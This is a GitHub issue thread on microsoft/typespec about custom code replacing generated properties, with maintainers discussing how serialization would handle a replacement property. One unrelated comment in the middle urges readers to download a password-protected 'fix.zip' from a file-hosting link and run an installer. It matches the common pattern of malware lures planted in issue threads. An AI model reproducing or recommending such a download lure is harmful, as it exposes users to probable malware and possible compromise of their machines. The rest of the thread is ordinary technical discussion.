### ISSUE TITLE
Support replacing a member in custom code (Properties)

### ISSUE THREAD

**Issue by m-nash** [microsoft/typespec#4266]
Support https://github.com/Azure/autorest.csharp/blob/feature/v3/readme.md#replace-any-generated-member for properties.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ArcturusZhang** [comment]
I believe this needs more discussion on how to do this, therefore I would like to drop this for a while to do something else with higher priority

**Comment by JoshLove-msft** [comment]
This would need to incorporate serialization of the custom property, i.e. if property `Foo` replaces `Bar`, the serialization code would need to look at `Foo` property but still use the WireFormat of the property. This may mean that we need to have the Canonical View for a TypeProvider.

**Comment by ArcturusZhang** [comment]
> This would need to incorporate serialization of the custom property, i.e. if property `Foo` replaces `Bar`, the serialization code would need to look at `Foo` property but still use the WireFormat of the property. This may mean that we need to have the Canonical View for a TypeProvider.

yeah this is what i am thinking
